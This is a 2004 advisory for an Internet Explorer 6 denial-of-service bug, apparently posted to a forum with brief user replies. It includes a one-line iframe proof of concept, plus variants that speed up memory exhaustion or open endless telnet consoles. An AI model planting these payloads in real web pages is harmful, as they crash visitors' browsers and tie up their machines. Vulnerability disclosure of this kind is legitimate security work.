######################################### Application: Internet Explorer Vendors: http://www.microsoft.com Version: 6.0.2800 Platforms: Windows Bug: Crash(D.O.S) Risk: Low Exploitation: Local with browser Date: 7 Apr 2004 Author: Emmanouel Kellinis e-mail: me@cipher(dot)org(dot)uk #########################################
======= Product ======= A popular Web browser, created by Microsoft, used to view pages on the World Wide Web.
=== Bug === Iframe element(TAG) creates an inline frame that contains another document. If you use the character '?' as the document , Internet explorer starts an infinite loop of IFrames inside Iframes , this causes IE's crash.
===================== Proof Of Concept Code =====================
Create a web page and you add an IFRAME which points to --> ?
Example : < iframe src= " ? " >
Crashes completely IE 6 in about 20 secs and consumes more than 24 MBs of RAM and uses 99% of the CPU power. Additionally, memory consumption and Crashing time can vary , depending on how many characters you add after the '?' character.
a)if you put two < iframe src= " ? " > in a web page resources will grow exp , 60 MBs of RAM in less than 10 seconds.
b)if you add < iframe src= " ? " > and < iframe src= " telnet:// " > will popup an infinite number of telnet consoles , you can do that with all the protocols , ftp:// etc
Yorn
Apr 9 2004, 03:43 PM
This will only work locally (ie if you double-click on the html in windows) not remotely.
linuxwolf
Apr 11 2004, 12:41 PM
Looks pretty sweet. nice damage eh.. Ah well. That's windows for you. As i may have said, ever since that piece of win2k code got ripped, ie's source was in it. Now ie is literally a trap. But windows alwyas was a risk.
qcred11
Apr 11 2004, 06:34 PM
I agree with you linuxwolf. Better suggestion to everybody - completely uninstall IE and install Mozilla or Opera instead or switch your OS to Linux!
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
